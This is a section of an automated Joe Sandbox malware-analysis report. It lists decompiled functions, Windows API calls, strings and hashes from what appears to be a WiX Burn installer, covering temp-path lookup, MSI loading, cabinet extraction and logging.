                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 004707DC
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 004709DD
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 004707A8, 004709B3
                                                                                                                                                          • Failed to ensure array size for system TEMP value., xrefs: 00470953
                                                                                                                                                          • Failed to check if running as system., xrefs: 004707EE
                                                                                                                                                          • Failed to load kernel32.dll, xrefs: 0047079C
                                                                                                                                                          • Failed to ensure array size for Windows\TEMP value., xrefs: 004709A7
                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 00470868
                                                                                                                                                          • Failed to get system Windows subdirectory path TEMP., xrefs: 00470985
                                                                                                                                                          • Failed to ensure array size for Windows\SystemTemp value., xrefs: 0047083E
                                                                                                                                                          • Failed to open system environment registry key., xrefs: 0047089A
                                                                                                                                                          • kernel32.dll, xrefs: 0047078C
                                                                                                                                                          • GetTempPath2W, xrefs: 004707BC
                                                                                                                                                          • SystemTemp, xrefs: 00470809
                                                                                                                                                          • Failed to get temp path from system TMP., xrefs: 004708CA
                                                                                                                                                          • Failed to ensure array size for system TMP value., xrefs: 004708F4
                                                                                                                                                          • Failed to get temp path from system TEMP., xrefs: 0047092C
                                                                                                                                                          • Failed to get system Windows subdirectory path SystemTemp., xrefs: 00470819
                                                                                                                                                          • TEMP, xrefs: 00470919, 00470975
                                                                                                                                                          • TMP, xrefs: 004708B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
                                                                                                                                                          • String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll
                                                                                                                                                          • API String ID: 1593934338-1326448564
                                                                                                                                                          • Opcode ID: 73f9f7b3b521d66e9a3a15f4bac467cc3e00539c18fe34882a7a3f1749bd14cd
                                                                                                                                                          • Instruction ID: f3f20c38a0f818d7727ddce1e5e93a94859339d1ca01e3b9223e4880cf6eb5cf
                                                                                                                                                          • Opcode Fuzzy Hash: 73f9f7b3b521d66e9a3a15f4bac467cc3e00539c18fe34882a7a3f1749bd14cd
                                                                                                                                                          • Instruction Fuzzy Hash: E471D8B1B82325FBEB219A50CC5AFDE7664DF11B15F218057FA047A2C3E3B89D1186C9
                                                                                                                                                          Function 0046A557 Relevance: 36.8, APIs: 9, Strings: 12, Instructions: 96libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 462 46a557-46a577 call 40192e 465 46a59a-46a5a7 call 40588e 462->465 466 46a579-46a595 call 4012a1 462->466 470 46a5ac-46a5c9 GetProcAddress 465->470 471 46a6f0-46a6f4 466->471 472 46a5d0-46a5ed GetProcAddress 470->472 473 46a5cb 470->473 476 46a6f6-46a6f9 call 404128 471->476 477 46a6fe-46a702 471->477 474 46a5f4-46a611 GetProcAddress 472->474 475 46a5ef 472->475 473->472 478 46a613 474->478 479 46a618-46a635 GetProcAddress 474->479 475->474 476->477 478->479 481 46a637 479->481 482 46a63c-46a659 GetProcAddress 479->482 481->482 483 46a660-46a67d GetProcAddress 482->483 484 46a65b 482->484 485 46a684-46a6a1 GetProcAddress 483->485 486 46a67f 483->486 484->483 487 46a6a3 485->487 488 46a6a8-46a6af 485->488 486->485 487->488 489 46a6c7-46a6ce 488->489 490 46a6b1-46a6c2 GetProcAddress 488->490 491 46a6e6 489->491 492 46a6d0-46a6e1 GetProcAddress 489->492 490->489 491->471 492->491
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0046A5B7
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0046A5DB
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0046A5FF
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0046A623
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0046A647
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0046A66B
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0046A68F
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0046A6BC
                                                                                                                                                          • GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0046A6DB
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0046A588
                                                                                                                                                          • Failed to load Msi.DLL, xrefs: 0046A579
                                                                                                                                                          • MsiSetExternalUIRecord, xrefs: 0046A660
                                                                                                                                                          • MsiDeterminePatchSequenceW, xrefs: 0046A5AC
                                                                                                                                                          • MsiBeginTransactionW, xrefs: 0046A6B1
                                                                                                                                                          • MsiEnumProductsExW, xrefs: 0046A5F4
                                                                                                                                                          • MsiSourceListAddSourceExW, xrefs: 0046A684
                                                                                                                                                          • MsiEndTransaction, xrefs: 0046A6D0
                                                                                                                                                          • Msi.dll, xrefs: 0046A569
                                                                                                                                                          • MsiGetProductInfoExW, xrefs: 0046A63C
                                                                                                                                                          • MsiGetPatchInfoExW, xrefs: 0046A618
                                                                                                                                                          • MsiDetermineApplicablePatchesW, xrefs: 0046A5D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                          • API String ID: 190572456-104341795
                                                                                                                                                          • Opcode ID: a0edc544dc1483869eed9476213ad9e37e3572cc2518a7d46e7c57875e5c54b5
                                                                                                                                                          • Instruction ID: 3e015899b0414e053c38db4810faae47a9b0b86bc662762cf7d8dfc72c72aeb1
                                                                                                                                                          • Opcode Fuzzy Hash: a0edc544dc1483869eed9476213ad9e37e3572cc2518a7d46e7c57875e5c54b5
                                                                                                                                                          • Instruction Fuzzy Hash: E341C270544701AFDB21AF20EF09B1B3EA2E725745F6042BAE001A52B1EBF90995CF5E
                                                                                                                                                          Function 0046553F Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 99libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 674 46553f-465554 call 4018a4 677 465556-465582 GetProcAddress * 2 674->677 678 465584 674->678 679 465589-465590 677->679 678->679 680 465592-465594 679->680 681 46559a-4655ad call 4018a4 679->681 680->681 682 465688 680->682 686 4655af-4655bb 681->686 687 4655cd-4655ea GetProcAddress 681->687 684 465692-465696 682->684 690 4655c0-4655c8 call 4012a1 686->690 688 4655ec-4655ee 687->688 689 46562b-465648 GetProcAddress 687->689 688->689 691 4655f0-4655fa GetLastError 688->691 689->682 692 46564a-46564c 689->692 690->684 694 465607 691->694 695 4655fc-465605 691->695 692->682 696 46564e-465658 GetLastError 692->696 698 46560e-465626 call 40129e 694->698 699 465609 694->699 695->694 700 465665 696->700 701 46565a-465663 696->701 708 465628-465629 698->708 699->698 703 465667 700->703 704 46566c-465686 call 40129e 700->704 701->700 703->704 704->708 708->690
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00465561
                                                                                                                                                          • GetProcAddress.KERNEL32(SystemFunction041), ref: 00465577
                                                                                                                                                          • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 004655D8
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004655F0
                                                                                                                                                          • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00465636
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0046564E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorLast$LibraryLoad
                                                                                                                                                          • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                          • API String ID: 1969025732-1098473289
                                                                                                                                                          • Opcode ID: 97f6f7af0809badfd44ed34861363f89320a7a1212632f73e30d3a33465e5f5c
                                                                                                                                                          • Instruction ID: 3a072f627e31f1ff9c812f3913af7430aae39e784ff76bf5544362242103e3cf
                                                                                                                                                          • Opcode Fuzzy Hash: 97f6f7af0809badfd44ed34861363f89320a7a1212632f73e30d3a33465e5f5c
                                                                                                                                                          • Instruction Fuzzy Hash: AA31E632A81721BBD73257109E19B0729515721B95F964277FD08BA2E1F3EC4802CBAD
                                                                                                                                                          Function 00439A90 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 709 439a90-439abf CoInitializeEx 710 439ac1-439ae0 call 4012a1 709->710 711 439ae5-439b33 call 476545 709->711 718 439d63-439d73 call 451586 710->718 716 439b35-439b68 call 40129e call 4012a1 711->716 717 439b6d-439b80 call 476566 711->717 737 439d5d CoUninitialize 716->737 723 439b85-439b8f 717->723 726 439b95-439b9d 723->726 727 439c5a-439c65 SetEvent 723->727 731 439ba3-439ba9 726->731 732 439d54-439d5c call 476576 726->732 728 439cb0-439cbe call 4017b5 727->728 729 439c67-439c71 GetLastError 727->729 746 439cc0-439cd7 728->746 747 439cd9-439ce4 ResetEvent 728->747 735 439c73-439c7c 729->735 736 439c7e 729->736 731->732 738 439baf-439bb7 731->738 732->737 735->736 741 439c82-439c94 call 40129e 736->741 742 439c80 736->742 737->718 743 439c31-439c55 call 4012a1 738->743 744 439bb9-439bbb 738->744 775 439c99-439ca2 741->775 742->741 743->732 749 439bce-439bd1 744->749 750 439bbd 744->750 754 439ca3-439cab call 4012a1 746->754 755 439ce6-439cf0 GetLastError 747->755 756 439d1d-439d23 747->756 751 439bd3 749->751 752 439c2b 749->752 758 439bc3-439bcc 750->758 759 439bbf-439bc1 750->759 761 439c12-439c17 751->761 762 439be1-439be6 751->762 763 439c20-439c25 751->763 764 439c27-439c29 751->764 765 439bf6-439bfb 751->765 766 439c04-439c09 751->766 767 439c0b-439c10 751->767 768 439bda-439bdf 751->768 769 439c19-439c1e 751->769 770 439be8-439bed 751->770 771 439bef-439bf4 751->771 772 439bfd-439c02 751->772 760 439c2d-439c2f 752->760 754->732 773 439cf2-439cfb 755->773 774 439cfd 755->774 776 439d25-439d28 756->776 777 439d4f 756->777 758->760 759->760 760->727 760->743 761->743 762->743 763->743 764->743 765->743 766->743 767->743 768->743 769->743 770->743 771->743 772->743 773->774 779 439d01-439d18 call 40129e 774->779 780 439cff 774->780 775->754 781 439d4b-439d4d 776->781 782 439d2a-439d46 call 40129e 776->782 777->732 779->775 780->779 781->732 782->775
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 00439AB5
                                                                                                                                                          • CoUninitialize.OLE32 ref: 00439D5D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 3442037557-213801148
                                                                                                                                                          • Opcode ID: 8c895ae16fd3c145c1bce160baf36d13095f82af4bd0cf57aafd73db0e68bf9f
                                                                                                                                                          • Instruction ID: 30aa8276e6983df3f93f4df2df746a396f6a717bbebe5203e379e180d8e9f310
                                                                                                                                                          • Opcode Fuzzy Hash: 8c895ae16fd3c145c1bce160baf36d13095f82af4bd0cf57aafd73db0e68bf9f
                                                                                                                                                          • Instruction Fuzzy Hash: 1E617B36E44325BBE73056148C82F6F66989708720F21627BBD05BB3D0D2ED9C0197DE
                                                                                                                                                          Function 0041030A Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 146fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 788 41030a-41033a 789 41033c-41035a CreateFileW 788->789 790 4103af-4103cd GetCurrentProcess * 2 DuplicateHandle 788->790 791 410360-41036a GetLastError 789->791 792 410409-41040c 789->792 790->792 793 4103cf-4103d9 GetLastError 790->793 794 410377 791->794 795 41036c-410375 791->795 796 410416-410418 792->796 797 41040e-410414 792->797 798 4103e6 793->798 799 4103db-4103e4 793->799 800 410379 794->800 801 41037e-410393 call 40129e 794->801 795->794 802 41041a-410428 SetFilePointerEx 796->802 797->802 803 4103e8 798->803 804 4103ed-410407 call 40129e 798->804 799->798 800->801 816 410398-4103aa call 4012a1 801->816 807 41046b-410471 802->807 808 41042a-410434 GetLastError 802->808 803->804 804->816 813 4104a1-4104a7 807->813 814 410473-410477 call 43a11b 807->814 811 410441 808->811 812 410436-41043f 808->812 817 410443 811->817 818 410448-410469 call 40129e 811->818 812->811 819 41047c-410480 814->819 816->813 817->818 825 410499-41049e call 4012a1 818->825 819->813 822 410482-410494 819->822 822->825 825->813
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0041054B,0040955C,?,?,0040959C), ref: 0041034F
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 00410360
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?), ref: 004103B4
                                                                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103BE
                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103C5
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103CF
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 00410420
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 0041042A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                          • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix\wix\src\burn\engine\container.cpp$feclient.dll
                                                                                                                                                          • API String ID: 2619879409-1724592608
                                                                                                                                                          • Opcode ID: 6f50f1eb17cde8f991b6cec1b0e480567b77f9dba5b3077e770676d0c330b6fd
                                                                                                                                                          • Instruction ID: 066b00333260b9683d33e398a9ea8d56f51055d5a617c65569765716fb10c428
                                                                                                                                                          • Opcode Fuzzy Hash: 6f50f1eb17cde8f991b6cec1b0e480567b77f9dba5b3077e770676d0c330b6fd
                                                                                                                                                          • Instruction Fuzzy Hash: 4E41CA32A41235BBD7219E19CC85F9B7B68EF04760F114126FD18B7291D3A8DCD087E9
                                                                                                                                                          Function 00466096 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 852 466096-4660b6 EnterCriticalSection 853 4660f1-466104 call 405d77 852->853 854 4660b8-4660bb 852->854 860 466106-466112 853->860 861 466117-466121 call 407055 853->861 854->853 855 4660bd-4660d1 call 405e84 854->855 859 4660d6-4660da 855->859 862 4660e0-4660ec 859->862 863 46623e-466247 859->863 864 46629b-4662a5 call 4012a1 860->864 874 466123-466136 call 40613d 861->874 875 466150-466158 861->875 862->864 867 46624e-466255 863->867 868 466249 call 465ec5 863->868 877 4662a8-4662b7 LeaveCriticalSection 864->877 872 466257-466258 call 4663a6 867->872 873 466272-466275 867->873 868->867 885 46625d-466264 872->885 876 466277-46628a call 403958 873->876 873->877 893 466138-466144 874->893 894 466149-46614e 874->894 878 46615b-466169 call 4065c3 875->878 876->877 895 46628c-466296 876->895 883 4662c1-4662c5 877->883 884 4662b9-4662bc call 404128 877->884 896 46617f-46618c call 40241c 878->896 897 46616b-46617a 878->897 890 4662c7-4662ca call 404128 883->890 891 4662cf-4662d5 883->891 884->883 885->873 892 466266-46626c call 404128 885->892 890->891 892->873 893->864 894->878 895->864 903 4661b2-4661e6 CreateFileW 896->903 904 46618e-4661a0 896->904 897->864 906 46622f-466231 903->906 907 4661e8-4661f2 GetLastError 903->907 905 4661a5-4661ad call 4012a1 904->905 905->877 906->863 908 466233-466238 SetFilePointer 906->908 910 4661f4-4661fd 907->910 911 4661ff 907->911 908->863 910->911 912 466201-466225 call 40129e 911->912 913 46622a 911->913 912->905 913->906
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,00000001,0000000C,0000000C,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000), ref: 004660AB
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004B2588,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 004662AD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls
                                                                                                                                                          • API String ID: 3168844106-2838138393
                                                                                                                                                          • Opcode ID: 9da463cbe7c00b70671c99809f3d64aba866bd1c5fc675782202164fee079cca
                                                                                                                                                          • Instruction ID: 309f56712ebc4c731a976ceef0ec16864860403c71c1a519c0cee66e9bda4732
                                                                                                                                                          • Opcode Fuzzy Hash: 9da463cbe7c00b70671c99809f3d64aba866bd1c5fc675782202164fee079cca
                                                                                                                                                          • Instruction Fuzzy Hash: 0B513971A40315BBDB216F60CD66F9B3A68AB01750F12067BF904BA2D1F7F89D009B6D
                                                                                                                                                          Function 0043A11B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 123COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 917 43a11b-43a13b call 403958 920 43a154-43a164 CreateEventW 917->920 921 43a13d-43a14f 917->921 923 43a166-43a170 GetLastError 920->923 924 43a1aa-43a1ba CreateEventW 920->924 922 43a262 921->922 927 43a267-43a26c call 4012a1 922->927 928 43a172-43a17b 923->928 929 43a17d 923->929 925 43a1f3-43a208 CreateThread 924->925 926 43a1bc-43a1c6 GetLastError 924->926 933 43a244-43a245 call 439eb4 925->933 934 43a20a-43a214 GetLastError 925->934 930 43a1d3 926->930 931 43a1c8-43a1d1 926->931 949 43a26f-43a275 927->949 928->929 935 43a184-43a196 call 40129e 929->935 936 43a17f 929->936 939 43a1d5 930->939 940 43a1da-43a1f1 call 40129e 930->940 931->930 947 43a24a-43a24e 933->947 942 43a221 934->942 943 43a216-43a21f 934->943 951 43a19b-43a1a5 935->951 936->935 939->940 940->951 944 43a223 942->944 945 43a228-43a23f call 40129e 942->945 943->942 944->945 945->951 947->949 952 43a250-43a25d 947->952 951->927 952->922
                                                                                                                                                          APIs
                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,0041047C,?,00000000,?,0041054B), ref: 0043A159
                                                                                                                                                          • GetLastError.KERNEL32(?,0041047C,?,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 0043A166
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorEventLast
                                                                                                                                                          • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix\wix\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                                          • API String ID: 545576003-2804420087
